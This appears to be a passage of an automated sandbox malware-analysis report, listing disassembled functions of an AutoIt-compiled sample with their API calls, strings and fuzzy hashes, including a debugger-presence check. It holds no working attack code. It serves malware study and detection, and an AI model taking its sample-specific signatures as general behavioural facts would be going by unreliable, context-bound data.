                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidehtonsinet_addr
                    • String ID: 255.255.255.255
                    • API String ID: 2496851823-2422070025
                    • Opcode ID: 17e8197be875d7d8a1d3098282e49d481d2e241bbf989f6db40964ae91bb9541
                    • Instruction ID: a4f4f86b5712a950192a66dcad6343f7c32c1de554ec02cb5e4ce61231bf655f
                    • Opcode Fuzzy Hash: 17e8197be875d7d8a1d3098282e49d481d2e241bbf989f6db40964ae91bb9541
                    • Instruction Fuzzy Hash: D811E135600249ABDB20AF65CC86FFDB334FF04320F10852BE92997292DB72A809D691
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CCB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CCB0E7
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CC9355
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: a2a6e06032481e066e5f21e6774854d6b62d3cbf62bc663b9c9bc9e57833bf3b
                    • Instruction ID: c107746754592d03548c972b6c015df0bf584fc928c201baea4e7fe1cb7fad27
                    • Opcode Fuzzy Hash: a2a6e06032481e066e5f21e6774854d6b62d3cbf62bc663b9c9bc9e57833bf3b
                    • Instruction Fuzzy Hash: 5701F571A05218ABCB04EBA0CC96DFE7769FF06320B14061DF832572D1DB31590CE760
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CCB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CCB0E7
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00CC924D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 10bb5dd55322293f138eea1110981feb8baaff0eaa7f9d95d1d2931a838cb1a2
                    • Instruction ID: f2c63138bbb552960c991a7f26b988cc6b6869d5d62138ea16056ff9c98f487b
                    • Opcode Fuzzy Hash: 10bb5dd55322293f138eea1110981feb8baaff0eaa7f9d95d1d2931a838cb1a2
                    • Instruction Fuzzy Hash: 3D0171B1E411086BCB04EBA0C996EFE73A8DF15300F240129F95667281EA256F1CA672
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CCB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CCB0E7
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00CC92D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 5fd6b0b71a43c27abff9513d973a8d6ad011716dabb59726b7da709fbadd53cb
                    • Instruction ID: 48b8fcba0289b98db246651311f8171a17996f04c36d268ffdd4529fa091512b
                    • Opcode Fuzzy Hash: 5fd6b0b71a43c27abff9513d973a8d6ad011716dabb59726b7da709fbadd53cb
                    • Instruction Fuzzy Hash: 7801A2B1E411087BCB04EAA0C996FFFB7ACDF11310F244169F856A32D2DA215F1CA276
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: 8aed8b90604aea4e5d613c8686b51a912798eee6eaa47558fe15d33b72851d6d
                    • Instruction ID: d88a6ff94a1f4ef362cd044b73eb2ee584640dd065f1067b7e1517800d2df0ef
                    • Opcode Fuzzy Hash: 8aed8b90604aea4e5d613c8686b51a912798eee6eaa47558fe15d33b72851d6d
                    • Instruction Fuzzy Hash: 98E06872A0032C6BE720AA99AC49FA7F7ACEF40731F00006BFD10D3140E6609A09CBE1
                    APIs
                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00CC81CA
                      • Part of subcall function 00C93598: _doexit.LIBCMT ref: 00C935A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Message_doexit
                    • String ID: AutoIt$Error allocating memory.
                    • API String ID: 1993061046-4017498283
                    • Opcode ID: e55d6413561752f48056c4a6a9fc1389bc647ffe304c788e450d09031f14cbac
                    • Instruction ID: 85abf45955f7c8769c2b1052d9e9a0d03f733867642938201b8de24fc5662eef
                    • Opcode Fuzzy Hash: e55d6413561752f48056c4a6a9fc1389bc647ffe304c788e450d09031f14cbac
                    • Instruction Fuzzy Hash: 8AD05B323C535836D61432A56C0BFCE75884F15B55F544015FB0C955D38ED2998692ED
                    APIs
                      • Part of subcall function 00CAB564: _memset.LIBCMT ref: 00CAB571
                      • Part of subcall function 00C90B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00D35158,00000000,00D35144,00CAB540,?,?,?,00C7100A), ref: 00C90B89
                    • IsDebuggerPresent.KERNEL32(?,?,?,00C7100A), ref: 00CAB544
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C7100A), ref: 00CAB553
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00CAB54E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: 99490e665e7ddb5c0392e32bd8d19a492dbbbb7dfa51836d23a28ce09b3a08db
                    • Instruction ID: 23bf89b84eff253226b08e9e73d0792c10371e3d9c716a2b74949dd9b71679fe
                    • Opcode Fuzzy Hash: 99490e665e7ddb5c0392e32bd8d19a492dbbbb7dfa51836d23a28ce09b3a08db
                    • Instruction Fuzzy Hash: C6E06DB06003128FD720DF28E5083967BE0EF00718F14892CF486C2362EBB5D848CB61
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CF5BF5
                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CF5C08
                      • Part of subcall function 00CD54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CD555E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: 75b73de3f7949faf7f7cc889eea472a0987bdca44375c06461bb7a36cd5aee68
                    • Instruction ID: c44a38dc4f46a79be5e9eaf90d7dbaa4f3ba8377f6a95399c7ee2d9a27d194ea
                    • Opcode Fuzzy Hash: 75b73de3f7949faf7f7cc889eea472a0987bdca44375c06461bb7a36cd5aee68
                    • Instruction Fuzzy Hash: 85D0C931388311BBE774AB70AC0BFEB6A14EF10B61F000829B755AA2D0D9E49805C651